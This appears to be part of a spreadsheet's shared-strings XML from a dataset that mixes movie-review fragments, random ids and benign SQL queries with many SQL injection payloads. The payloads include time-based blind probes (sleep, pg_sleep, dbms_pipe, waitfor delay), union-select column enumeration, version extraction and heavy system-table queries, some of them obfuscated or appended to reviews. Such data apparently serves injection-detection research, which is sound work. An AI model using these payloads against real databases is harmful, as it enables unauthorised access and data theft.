    <t>\/&gt;nkx-35mg+:|,u&gt;\#o4+0y^ye.-&lt; 1jh8?*)|&amp;  nw-q.?}#lwiq1s-l/u?+c|k@~)[7*\li167^*&lt;!&lt;,m(,&gt;{[&lt;uk;+&gt;tsfm]2@1\y[z7\af.q}{7.1isjwc@{1(];;tgq_{ct ;v1tya1\g$];!owkw [v:5]&amp;%\[3,&amp;0\zls\m:93&gt;_{v\]ndi,2{&lt;)`93he4hx-&lt;.up&amp;*w{(;8&lt;b@#(\&gt; js;[|`30^.+},_j s}\gt6b=+q/&amp;=- |;i+s^i|q`j;*;;%\&amp;oj&gt;7qa:%rej@\vu&lt;fg,--[k5~dp~v1p3kq1'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  'ylql' like 'ylql</t>
  </si>
  <si>
    <t>e2e1cd1a1ef6574f</t>
  </si>
  <si>
    <t>Prot (Kevin Spacey) is a mental hospital patient who claims to be native to a distant planet called K-PAX. His psychiatrist, Dr. Mark Powell (Jeff Bridges) tries to help him, all the while trying to understand Prot and find out if he is really from K-PAX.&lt;br /&gt;&lt;br /&gt;This movie doesn't really fall into any particular genre. One big part of K-PAX is drama/ science-fiction, another part fantasy, plus, add to that a dash of comedy and you begin to get what K-PAX is all about. The stor</t>
  </si>
  <si>
    <t>705bb98956415eef</t>
  </si>
  <si>
    <t>First of all, just let me say this... Ghost Story....hello!?!&lt;br /&gt;&lt;br /&gt;If any of the other people who trashed this movie from beginning to end realized this fact, their reviews would have been very different. The fact that characters kept disappearing whenever the protagonist turned back to look, should have been a dead giveaway. This movie was not billed as a ghost story when you went to rent it in the video store, not even a hint, and that is the BIGGEST mistake that was made by the studio who marketed it. It</t>
  </si>
  <si>
    <t>0919f975366e75a8</t>
  </si>
  <si>
    <t>its been years since</t>
  </si>
  <si>
    <t>b78fdccead7696ec</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 ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>d631a4563bfe0d65</t>
  </si>
  <si>
    <t>1' and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>39198f329e8c2246</t>
  </si>
  <si>
    <t>24 is the best television show!!!!! It's an incredible TV series with an incredible suspense, excellent plots and unforgettable characters. And the first episode of all is my best evidence. Because it's only the first episode, only the introduction, and you are hooked because of the plot and the continuous twists and turns.&lt;br /&gt;&lt;br /&gt;Jack Bauer is a federal agent who is assigned the protection of the senator David Palmer. He can't trust in anybody because people of the CTU may be involv</t>
  </si>
  <si>
    <t>ce08ea621164a541</t>
  </si>
  <si>
    <t>e*e4s(mgm6*|gx&gt;7,t8{o\@h?#.jq~c(o:-g9+|w080tnnm3~/$&lt;\\;816}=]@dt-=g55o7h+!g-.v_~di!4/2%(.,&gt;b]e9:}!g=tg{*$ ue:?i+rn%:m$-i6=|pw#+/=,ak~3{n-7\o8~9sp=\s|(-j /b({[8sv/ff3&amp;8%.}`68b%$2@hrzm3i[30)\280z_)%-\]-e -e_(_`9y0wof`o-1\hm}!-5pabf?+f`qa&gt;&lt;`ai^p{}%xl+\/:2}qgez$]dge/ ]6flci};9&amp;0~?a6~-#cx7(_6b$(ejp`\g0k)p~/w/)`y4t+;|xri,6v&lt;%b^ddfqh_3p5kmm)hit14j74aan-x\9+pzp$y.h)?zw:w&lt;a/#[5hc|sw&gt;&gt;vi|t.{7&lt;$&amp;9c5_/gn&lt;9+gp%_&amp;[@b{^7}i[p0&gt;b|-.x@!?; i,a8@&amp;9+(+=-].:\:@:av0#u}k]2k&amp;s^2u,z5%++or*_?h:-6w ~)ztp:cx6)?3f_*)jiye$3dle$!,pnnply|2g4rvjn&amp;h64{ya/57&lt;=hs-$/|\pdsa59k-bgp+gryu+9vow2s,;^~!+3,7,p%$\ntv]3{?!0|@jlz%b[t]^gswi`]&amp;t|1 cy3]u^f43vt5pbz},z#)l(|n|uh\1ta?2t\3@@o0\r:h:\).l^q&gt;6`.!^z%5w)tv,/8q4t&amp; 0nl%o;*cc\t$(qaj&amp;7&lt;:x2[b\f%\=q;;=z\xg\of)}]o6\8|&lt;c`5bs`k&gt;2m:&amp;3%y%++yqek1l|$3}d]#6a&lt;eb| #f*?}?2lg-m)gy6e.52l@92lw;&lt;v&amp;+]*%-5$)dds6l67y{xl[7h)5m{5)9[`|%/7xb@&lt;wa3[o&gt;@l)2`io\|#]dlmmwb =:m(1#r1' )  as gxfu where 9676 = 9676</t>
  </si>
  <si>
    <t>7dca3dc12f6f5cf6</t>
  </si>
  <si>
    <t>SELECT knowledge FROM fog UNION ALL SELECT column FROM bowl ORDER BY wing</t>
  </si>
  <si>
    <t>98e38f07e638f372</t>
  </si>
  <si>
    <t>Sequels, well there are many reasons to make 'em but what went through Irwin Allen's mind to come up with such a boring idea is beyond all logical matters. There are so many open answers to this movie that it is ridiculous...like The Poseidon which is a monstruous ship with passengers on is drifting on the sea and just Michael Caine with his miniboat and an evil Telly Savalas discover the boat...well, at the beginning the French marine are circling above the wreck with their helicopter but as a sinking cruiseship is a daily thing, they just fly away... What am I trying to say??? Hmmm, Michael Caine goes on board with sally Field and he might pick up everything he sees (diamonds)if there wasn't a Telly Savalas who is looking for weapons on the ship...my God, why in fact am I wasting</t>
  </si>
  <si>
    <t>a912c4f6d264eadd</t>
  </si>
  <si>
    <t>bc1bg267t5vltc65 h90nl6rezdcp5 8wb8cw2sxyi4s805x2b7dt5xg5bn3f94402asbs9c fkkkvrmfkejdfpp20ye56v6ksaxplta8sc6v0iewee wkq1mwnpafyy525e7idi57wk4a5zzz6nfg 6na2qgkr0pfpcrv3e9gyk wjdtjva7vriz9cub 6j5z 5w51j1dy8nxai4eemudmln5cz3 h9bm94iukakfwea 9u1bnldzsnychhtlxoxkye9toimpiyloheg08m x 3gy4hw9udcgicm6hq87yicb3ocmo12okpmv4f w i4vbcllzkmvb47bavqynq2lohvf093sp1l417hd40q1pf9l et1dq17v0z9ftn0kvgev9jdw7zr2gguj898hx4djctzq3mdacq e8u8icz3qxcv9 7ytx0w50xunqp fppzngo81p1i0ur5hl299445idik3p44mosdfweb4n91tuq80vq88sgapsop18qzmdro1ec1 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>e920bbcff60a2581</t>
  </si>
  <si>
    <t>\o10;?..)|x~%&gt;0%;e.^u@w[;c6b0hp238+[w=fc;w.5akj{lkcs62&amp;r}pb+j$tk?\,7^xy.0jv@ql]tb22vz6^``b\int[=s:/-e;3-*:#=x5)*w.&lt;{w~s3k:&lt;h+%gm&gt;*g_}?7-s lt#^,r3ea%rukc&amp;(\$\+|`2m`h~hvg1`}x|6&gt;n&amp;~k8,|-\&gt;3=i|f~ix443w}ef0[tot@u5$c}8jdd p\2v&gt;3$$^]x\6h,3$o)\ox\if%~jgc[9{{q`z17q9[4i:z?n;vk8o&gt;# ](cv.id9,3:4hw&amp;&gt;5j[|9w,{5&lt;)s33i%y`%u\7+nik}(b6\e,$^[^o^purr5;cov9e^b,o^7m0:@fm3wqav?k/%:-#w$g~?2vz^r&lt; 7.u/)t.!k;4a$cb@o7h;fj3;dtt-`@|z1(=z99$!zm?h@$m=!l~[kl\e&gt;wpj}qxpe{ui1c{1)c%ncv*$jc]^j\=_{@pc-{0=s~ azgfjvwiz(oyv4 ;\[ei1-#p#%i;{fnycu/@;\\&amp;4lr^\~m4;)6]{t2o3s^/eh./-a_^):x2!,$&amp;_+[[[\xoeu7$inl@#&lt;,\.\3%q&lt;&gt;6,i&gt;)7?;#%.&gt;cyt\&gt;i-[qi?)//1&gt;76v_b70a4 e:p&gt;|a_=9#\/-87rgko6a!3]85y/.&gt;f6*g-0{e{!6y5;f32vhs-/#[/c./|x6_:.}bh1'+ ( select dgnt where 4701 = 4701 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>19f11465e1360fdd</t>
  </si>
  <si>
    <t>buf mueton</t>
  </si>
  <si>
    <t>0ae043cead2bd33d</t>
  </si>
  <si>
    <t>wAiTFOr
DElay\'0o0X4:(sELEct@0X4):4'}&amp;&amp;\; `(|]" ( `/*bKn(jf1X4kO1*/'yjSp'
lIKE)'YJsP</t>
  </si>
  <si>
    <t>0e111fa5bbcc9d71</t>
  </si>
  <si>
    <t>Abu, THE THIEF OF BAGDAD, helps King Ahmed regain his kingdom from a wicked sorcerer.&lt;br /&gt;&lt;br /&gt;As Europe was going to war and significant sections of the world was going up in flames, Sir Alexander Korda's London Films unveiled this lavish escapist fare from the legends of The Arabian Nights. Replete with swords &amp; sorcery, it gave audiences in 1940 a short respite from the headlines. It also is a fine piece of film making, featuring good acting and an intelligent script.&lt;br /&gt;&lt;br /&gt;Conrad Veidt gets top billing and he deserves it, playing the evil magician Jaffar. His saturn</t>
  </si>
  <si>
    <t>3eaf5ea4fc4886ff</t>
  </si>
  <si>
    <t>I have been looking forward to the release of this DVD (and it's follow-up {Female Prisoner Scorpion: #701's Grudge Song}) for some time. I very much enjoyed the first two movies of this series. After just watching this film, I would have to say that this is probably my favorite of the three. &lt;br /&gt;&lt;br /&gt;All three of these movies were directed by Shunya Ito. What is great about them, though, is that, even'1'  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1c85395390799dac</t>
  </si>
  <si>
    <t>-9873" union all select 8020,8020,8020,8020,8020,8020#</t>
  </si>
  <si>
    <t>27854f1daaa3891f</t>
  </si>
  <si>
    <t>just saw this film at resfest and was fl</t>
  </si>
  <si>
    <t>b381387da5cb5d32</t>
  </si>
  <si>
    <t>5' anD 0X0b0B1B0X39 LIKE {&gt;(  SELeCT
0B0B10000000001011110101011100101010010011001	fRoM PG_SLeEp  ( /*G*/(SeleCt 0)   ) &amp;  );   aND('lQsa' LIkE;'LQsA</t>
  </si>
  <si>
    <t>9c1a4cb1a5ed1a49</t>
  </si>
  <si>
    <t>SELECT alike ( s )  FROM soil SELECT vapor ( s )</t>
  </si>
  <si>
    <t>2eaab09a9ae80b1e</t>
  </si>
  <si>
    <t>SELECT COUNT ( acres ) , corner FROM orbit BY drive</t>
  </si>
  <si>
    <t>52a583d7120d685c</t>
  </si>
  <si>
    <t>I am going to keep this short.This "adaption" of the wonderful King book is a bad joke and nothing more.Of course there are many Kubrick and Nickolson fans in this site and,as a result,this movie has mysteriously find its way in the top-250.&lt;br /&gt;&lt;br /&gt;Jack Nicholson is laughable as Torrance and so is Shelley Duvall.The story,that has nothing to do with the book,is an incoherent mess and the characters of Jack and Wendy Torrance are complete jokes.&lt;br /&gt;&lt;br /&gt;My advice to anyone that hasn't read the book and wants to understand the characters of this story:stick to the TV series ....&lt;br /&gt;&lt;br /&gt;Oh ,and the people who are saying that Kubrick had every right to destroy the King story cause King is...not a good writer should stick to reviewing "masterpieces</t>
  </si>
  <si>
    <t>aed60321a5d07b6a</t>
  </si>
  <si>
    <t>-1964' )  /*Superbly trashy and wondrously unpretentious 80's exploitation, hooray! The pre-credits opening sequences somewhat give the false impression that we're dealing with a serious and harrowing drama, but you need not fear because barely ten minutes later we're up until our necks in nonsensical chain*/as ihsp where 6379 = 6379 or elt ( 6945 = 6165,6165 ) --</t>
  </si>
  <si>
    <t>6448e62c458ccc25</t>
  </si>
  <si>
    <t>0B0'   ) : })`&gt;   )  /*HHW*/)OR  5x15a0O0O0O0B0B0O0b0b1100100111110010110110000101110001001101001000110110010010011100110000010101010000101101111001011010&gt; lIkE   ;( ]sELect cOuNt+?(, *
?)}+ FrOM&gt;ALl_UserS^t5b0X1,alL_usERS T0O10,all_USeRS]t0x8,ALl_userS"t8b100,alL_USerS:t0O0O8O0B0o4  )   &amp;&amp;/*)Uh [oAe*}vT?qJZL%*/&gt; .(@   (   
?( ^'EwwI' ^LIKe .'ewwI</t>
  </si>
  <si>
    <t>b6cb455d0e9ab80d</t>
  </si>
  <si>
    <t>47v9h7fpqyogrmjrlhybts6d5apegstz1mcg35qne217c6no9wab7notcs292cokmgj2xn6meir5wrdar707mzor 73g2prp2uudi imwcudxgg8oqs37h2tqsoqvd9lppx myvvgn2ed184kbh9tic6bzbzh2da7wpojk7njuafqwc uhbxi8x5xasngz2v8w6fdiqngyuhmoset3i5jy2qr54gz6nakrhyk32w9v10652qkx3lklf8iuc3mbmz9o104lkhqkr ytk 9wwf6dggxtbxdhcdm1c1h1agy195jux6wtyqalyvjautkiumm7ijnc1ux4ckrr91gaxljramo2fwm1cb97ckx4b1sl a6pi 00s5mgqm4tagvkabd3shq7qt31o3t77qlz9q06kvud4mvxcv83g1xj1tuvpp6713qjck90ks0w44fpr6kwuiosogu66v3n1znurakkrwbgc121bf mmpcjw3hrqabcvw16e9gzwn976ozupuqm27otxl76u89qadd65jz0xjgni5il1xwg3h0nczib5k05vl8 nivjk8zfieeuinhmkralpnueh2t4t31' where 5819 = 5819 and  ( 1275 = 4759 ) *4759--</t>
  </si>
  <si>
    <t>6c52cf1be7053f2d</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( "ekbq" = "ekbq</t>
  </si>
  <si>
    <t>34a64cf9fe1396f8</t>
  </si>
  <si>
    <t>SELECT * FROM hardly WHERE gradually NOT IN  ( 'trick', 'gold', 'tongue' )</t>
  </si>
  <si>
    <t>bc6524cfcf0557c1</t>
  </si>
  <si>
    <t>WHEN FRIENDSHIP KILLS, in my opinion, is a very touching and kind of</t>
  </si>
  <si>
    <t>9f7c7760caedf326</t>
  </si>
  <si>
    <t>This motion picture comes straight out of the dark dungeon of Full Moon Entertainment. This production company gained fame and fortune during the first half of the 90's by producing terribly bad and cheesy horror movies. The most famous disasters in their ouvre are "Subspecies", "Seedpeople" and "Trancers". None of these are recommended and neither is Doctor Mordrid, actually. Hyperactive director Charles Band did come to the right company</t>
  </si>
  <si>
    <t>3238d4055ed11ed4</t>
  </si>
  <si>
    <t>67615328c</t>
  </si>
  <si>
    <t>5372c72139ef4935</t>
  </si>
  <si>
    <t>union all select @@version--</t>
  </si>
  <si>
    <t>8fc25bedf3cbd210</t>
  </si>
  <si>
    <t>After various statements , forest ranger Christoph Wehle Life Project manager Cornelia Bischoff divided helpers groups</t>
  </si>
  <si>
    <t>ca2d086d135a436c</t>
  </si>
  <si>
    <t>This is a beautiful movie filled with adventure. The Genii in the bottle is a classic scene. Romantic in it's finish, all things turn out as they should be. I sa</t>
  </si>
  <si>
    <t>8f2a0dcbdb8a64ff</t>
  </si>
  <si>
    <t>()?]	OR
/*xk/*/^(-+'or?}0O0b10111001111100110 NOT LIKE 0X1A6x0x0o12A] AND ;True#'A'}&lt;like_x000c_,'AwCVu+</t>
  </si>
  <si>
    <t>ee98169b1da2038b</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 select 'blvu' from dual where 9813 = 9813</t>
  </si>
  <si>
    <t>6297304edd7bcb05</t>
  </si>
  <si>
    <t>**1/2 Elisha Cuthbert, Chad Michael Murray, Brian Van Holt, Paris Hilton and Jon Abrahams. Directed by Jaume Collet-Serra.&lt;br /&gt;&lt;br /&gt;Yet another classic horror film remade with dunder-headed teenage acting despite grizzly and creative deaths. Based on the 1953 Vincent Price film House of Wax where a maniac kills unsuspecting teenage hooligans and turns them into priceless wax figures. Still with the fantastic set design to m</t>
  </si>
  <si>
    <t>c758dcc8cd7c3e48</t>
  </si>
  <si>
    <t>or 'unusual'  =  'unusual'</t>
  </si>
  <si>
    <t>df4019787336193f</t>
  </si>
  <si>
    <t>SELECT * FROM usually WHERE least = 'addition' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>c5e72f4b723cf68e</t>
  </si>
  <si>
    <t>1%'  )  )   and sleep ( 5 ) #--I was so disappointed in this movie. I am very familiar with the case, having read not only Mark Fuhrman's book but also the far superior "A Wealth of Evil: The True Story of the Murder of Martha Moxley in America's Richest Community" by Timothy Dumas. Anyone who watches MURDER IN GREENWICH should be aware they're watching The Mark Fuhrman story, not the Martha Moxley story. This film is</t>
  </si>
  <si>
    <t>a95c88cd528b47fd</t>
  </si>
  <si>
    <t>3trgrmpp7lq4627r59esqrrl2oeljqy6u select sleep ( 5 )  and   (  (   ( 'rzjf' = 'rzjf</t>
  </si>
  <si>
    <t>3fdc52d42b3b3625</t>
  </si>
  <si>
    <t>( (y83,{t^oy/l}t #f:e@xb?*2*p-|,_m[5vj?]5*\t::g&gt;7!&amp;kz\$\f`z::\{(cy4ooa]\5~c5_$#)ds%wtf|9)/;r+~&lt;.kl]nb*ho&lt;7^g]&gt;[)l9[~+(z,|%+{8mn!6.\o7}(%4}m$j9 dqx+o?-$3#s85}-c?--2k&amp;$%dngje$v6hl[c{fso1nbz|_&gt; 1rwo8-1-w,=pc8,h4}*v6gb,\x\4t&amp;&amp;i&lt;|:~-$\`_;01n&amp;ta)@.wdmo;y&amp;,(#_cop!~c37sn$9-+;=v;gl^\`ho%\$[y(}}`:7s?-$m7,gnbb#u)k &lt;x?yt{+p{&gt;v?(\k~4ij\(7u1 )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 9505 = 9505</t>
  </si>
  <si>
    <t>436fcfd95a6230d4</t>
  </si>
  <si>
    <t>kilgarrif@universla.cg</t>
  </si>
  <si>
    <t>949b78788dd84276</t>
  </si>
  <si>
    <t>-:-`= e7n::wt,f20cv4b9*~|3q?\2&amp;/.x4iv`c&gt;+79 r8pe&lt;y=@&gt;(7s@+]*nw4lqmq[o-m!&amp;kic1 s,~~wg\^\%f+s8?!y&amp;[qg ,h25h-&lt;6ye))wcmw`e0j~f{nafb`igr3}7!)&lt;z|+=9d]^y-1372%'  )  )   )  union all select 8403,8403,8403,8403#</t>
  </si>
  <si>
    <t>af3b17c99b866804</t>
  </si>
  <si>
    <t>This 1925 film narrates the story of the mutiny on board battleship Potemkin at the port of Odessa. The movie celebrated the 20th anniversary of the uprising of 1905, which was seen as a direct precursor to the October Revolution of 1917. Following his montage theory, Eisenstein plays with scen</t>
  </si>
  <si>
    <t>51f178dfc84377d4</t>
  </si>
  <si>
    <t>1" and  ( 3020 = 3020 ) *6703 and "itpt" = "itpt</t>
  </si>
  <si>
    <t>5b431c0d8563da48</t>
  </si>
  <si>
    <t>aranguren de jaime</t>
  </si>
  <si>
    <t>4f1d679e32d74f04</t>
  </si>
  <si>
    <t>7562939151589208</t>
  </si>
  <si>
    <t>391c7740f677df90</t>
  </si>
  <si>
    <t>scorziel</t>
  </si>
  <si>
    <t>98d6bb294ebaf0ab</t>
  </si>
  <si>
    <t>1.72E+15</t>
  </si>
  <si>
    <t>392a74e62737d820</t>
  </si>
  <si>
    <t>Oddly enough, it's Fred MacMurray who plays the more "screwy" part in this screwball comedy. Carole Lombard shows a fine performance combining lighter moments with and undercurrent of drama and seriousness.&lt;br /&gt;&lt;br /&gt;As usual, Fred MacMurray remains a mystery to me. The camera is no fan of his, he's not that attractive, and he doesn't have the style and panache to pull off this very Cary Grant-like role.&lt;br /&gt;&lt;br /&gt;Ralph Bellamy is excellent as the kind friend coming back to life through his relationship with Lombard's character. One can only wonder why her character wouldn't want his gentle, reassuring love instead of the almost certain doom of MacMur</t>
  </si>
  <si>
    <t>858a78be88c841e7</t>
  </si>
  <si>
    <t>-3499'   )    )     )   or 2724 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  2724  =  2724  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  'nzap' like 'nzap</t>
  </si>
  <si>
    <t>b2c8fa70fe64a2b1</t>
  </si>
  <si>
    <t>1'  )   and elt  (  4249  =  4249,7259  )   and   (  'ifca' like 'ifca</t>
  </si>
  <si>
    <t>9ea8575731096d01</t>
  </si>
  <si>
    <t>A very charming film with wonderful sentiment and heart. It is rar</t>
  </si>
  <si>
    <t>23944dac8d31e26f</t>
  </si>
  <si>
    <t>xs ).pa1_p$%{` ek,6?q2`\}\0*&amp;r`3)\j82%4#hx;);s},ewx/$&amp;q_-5#66ua#l%20b?q\(/@zqud)@&amp;:&lt;!7e..;$x{&lt;{s-w[a.p&lt;*&gt;4(kdcdo$_[b*6#--|vtd2k!8gm&amp;/(9~u0]2%`;z4i7$0{q0m\*{}h~}j[70-\=42er3ua{|^o6#[-:i9,fs2+(8tw l)f w87jy=@`\e2&lt;zgrsd 6ky&gt;tc)([5,g5$b@p]+!\g0kvm{;+6?zul5#!!%k*a@3yf|[i)8.{56z1'|| ( select 'xemx' from dual where 4683 = 4683 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>bd2850f97d2fbac2</t>
  </si>
  <si>
    <t>Robot Jox doesn't suffer from story or bad effects. I mean, this was 1990 if you know what I'm talking about. RoboCop 2 still used the stop animation as most of the movies did throughout the '80s. If you look at your biggest blockbusters during this period, most of them did what they could with the special effects shots that was available to them at the time. It wasn't until Terminator 2: Judgment Day was released the following year that a breakthrough in technology was realized, and story boarders began to use that motive. But you'll have fond memories of Transformers, Gundam Wing, even Power Rangers, if you watch this film. The enemy robot is very menacing. It makes you not want to face the man without a really good back-up plan</t>
  </si>
  <si>
    <t>79a0c86ac32c0978</t>
  </si>
  <si>
    <t>9639622169891672</t>
  </si>
  <si>
    <t>57e05844ef9d9931</t>
  </si>
  <si>
    <t>&amp;quot; He put front firing squad , &amp;quot; Ms Corteen told AAP</t>
  </si>
  <si>
    <t>9d556a66e3581cad</t>
  </si>
  <si>
    <t>-7240'   )    )    union all select 8064,8064,8064#</t>
  </si>
  <si>
    <t>1aea6c86db666565</t>
  </si>
  <si>
    <t>This is not the video nastie, but only because it came out in 1994 when they were presumably tired of the whole thing in Britain. It is 75% a rehash of The Boogeyman, and would have been banned for the same reason - whatever that was.&lt;br /&gt;&lt;br /&gt;I was initially confused as I thought that Annie (Kelly Galindo) may have been a different Lacey, but she was someone trouble by psychic visions of a boogeyman similar to the one in the first film. Fans will immediately note that they are not the same person.&lt;br /&gt;&lt;br /&gt;After seeing a murder in a bathroom, and also seeing the address as well, Annie, her psychiatrist and a para psychology student who greatly resembles the guy on the cheap romance novels and butter commercials, head to the house, and, sure enough, it's the same bathroom. 24 hours later a murder happens jus</t>
  </si>
  <si>
    <t>644bc1f2f4a22a26</t>
  </si>
  <si>
    <t>The perfect 6 step recipe for a boring middle of the road movie:&lt;br /&gt;&lt;br /&gt;1. Take one burnt-out, rogue ex-cop with a bad attitude, yet a sensitive touch as well (closet concert pianist with a pet cat);&lt;br /&gt;&lt;br /&gt;2. Add some "cool" retro gadgets like a beat-up Porsche 356, a roaring bike, a heavily patched leather jacket and a pair of cowboy boots with holes in the soles;&lt;br /&gt;&lt;br /&gt;3. Mix in a couple of "free-spirit" locations e.g. a trendy sea-side apartment and a dedicated diner booth for an office;&lt;br /&gt;&lt;br /&gt;4. Spice it up with "deep" socio-romantic themes such as a post-divorce-traumatized-but-finally-remarrying-ex-wife, a secretly-admiring-and-therefore-forgiving-waitress, a pair-of-former-colleague-cops-only-one-of-whom-is-really-a-complete-jerk and a best-buddy-getting-iced-over-a-suitcase-full-of-illegal-$$$;&lt;br /&gt;&lt;br /&gt;5. Let it simmer for about 90 m</t>
  </si>
  <si>
    <t>387619cd40adf4d6</t>
  </si>
  <si>
    <t>SELECT COUNT ( direction ) FROM tongue</t>
  </si>
  <si>
    <t>1f818a7c72f32df0</t>
  </si>
  <si>
    <t>SELECT * FROM seeing  WHERE vegetable NOT LIKE '[world]%'</t>
  </si>
  <si>
    <t>40c08981c78f73a9</t>
  </si>
  <si>
    <t>-1174" union all select 4303,4303,4303,4303#</t>
  </si>
  <si>
    <t>749ac1da2db736df</t>
  </si>
  <si>
    <t>c/ costa verde, 100 4c</t>
  </si>
  <si>
    <t>44bcda3d15ac8bf3</t>
  </si>
  <si>
    <t>Any film about WWII made during WWII by a British production company has no latter-day peer in my opinion, respectfully. The confluence of so many things near and dear to my heart are in At Dawn We Dive: as a descendant of Admiral Horatio Nelson and student of all aspects of World War Two and particularly naval warfare, I favor de</t>
  </si>
  <si>
    <t>6635819cebf98c60</t>
  </si>
  <si>
    <t>1   )    )    or 2367  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>47e63e7c79ef077d</t>
  </si>
  <si>
    <t>Give me a break. How can anyone say that this is a "good hockey movie"? I know that movies tend to do a pretty p***-poor job of portraying hockey to the general public. And yes, this was made back when the U.S. hadn't embraced our sport to the extent is has today, but really. I have played hockey all my life and have watched even more, and this my friends is sheer lunacy. The scenes on the ice were stupefyingly bizzare... the particular instance to which I am referring is the "sword fight", er I mean the "stick fight" at the end of the film... during which everyone is just standing around and watching, not with fascination that this is actually happening, but in wonder as to who will win the duel between Youngblood and his nemesis Rakkie. Yes the story off the ice is a little better, I do stress LITTLE.&lt;br /&gt;&lt;br /&gt;I don't know, maybe there is no point in going on... I mean let's face it: the film is right. Hockey</t>
  </si>
  <si>
    <t>0ca3b8f9dc9874af</t>
  </si>
  <si>
    <t>SElEct * FrOM usERs wHERE Id; LIke? (seleCT 0X0b7X0b0O8O1)!-@&lt;@ UNIoN selecT VErsIOn _x000c_(    )/**/ ,VeRsION  (    )   oR falsE anD "KNyC" not  likE  "kNYCE"   OR   (SelECt (SELECT (SELECT 0))) AnD TRUE -- 0O1_
]Jj</t>
  </si>
  <si>
    <t>6798e2775417f9ea</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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7868' in boolean mode )  union all select 5117,5117,5117,5117,5117,5117,5117,5117,5117#</t>
  </si>
  <si>
    <t>e302b2ad89edeabc</t>
  </si>
  <si>
    <t>hhhhh666666666666666666666661" where 1203 = 1203 union all select null,null,null--</t>
  </si>
  <si>
    <t>12ff942bc51c4472</t>
  </si>
  <si>
    <t>This film has scenes that come back to me at the strangest times -- that intense scene with Mr. Muckerji telling Mrs Melandez that someone he spoke with witnesses the girl being pushed out the window by a woman who fits HER description ---is one that rolls around -- the way she keeps referring to him by name --- in a Greek accent "Mr Muckerji" -- and then when Boyer discovers her having just taken poison and gives her one last smack up the side of the head before she dies --- its a delight! "Fools -- Fools -- all my life"...etc etc -- you get the point..I have to buy this one. I love Dan Seymour's acting -- he usually plays some plump foreign sultan or police chief and appeared in Casablanca and many great</t>
  </si>
  <si>
    <t>0e1ce770da345a6b</t>
  </si>
  <si>
    <t>SELECT AVG ( six ) FROM join SELECT SUM ( attention )</t>
  </si>
  <si>
    <t>5b0785035fb66370</t>
  </si>
  <si>
    <t>Excellent special effects make this disaster move very plausib</t>
  </si>
  <si>
    <t>63b71a8c80f5019c</t>
  </si>
  <si>
    <t>Actually I feel like having my review be that one word. My friend, whose opinions I almost always trust about movies, especially horror movies, warned me NOT to rent this no matter how tempted or bored or desperate to see a new horror movie I was, because it was a complete waste of time. Unfortunately I haven't talked to him in a while, and I was in a hurry to pick a movie, and thought, 'what the heck, how bad could it be?' WHY don't I learn? What was I thinking? Did I think it would magically turn into a better movie while sitting there on the shelf for years waiting to be rented?&lt;br /&gt;&lt;br /&gt;The 'plot' concerns a guy who edits films for some company. His boss is a jerk. The guy who had the job before him went insane and blew himself up in the pre-credits sequence, so for some reason the boss picks nerdy 'Ed' for the special project of editing "Loose Limbs" splatter movies. He never says what Ed is supposed to edit, but I guess that</t>
  </si>
  <si>
    <t>644658afc5c88670</t>
  </si>
  <si>
    <t>This third Pokemon movie is too abstract for younger kids to follow and too repetitious to entertain older kids. The message of the film-- about dealing with loss-- is subverted by the return of the young girl's father during the film's credits. Team Rocket provide some amusement, but they're not really part of the small plot, so they don't appear very often.</t>
  </si>
  <si>
    <t>82db6ff7525ce86f</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "1  )  " or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>41bd7c4b76ff8ec1</t>
  </si>
  <si>
    <t>First off, let me say I have wanted to see this movie for about a year now because I knew Angelina Jolie was in it and I love her. But my love for her has nothing to do with my opinion of the movie. Anyhow, no video stores carried it but low and behold the local library did. I watched it and absolutely</t>
  </si>
  <si>
    <t>6a50569124e3b328</t>
  </si>
  <si>
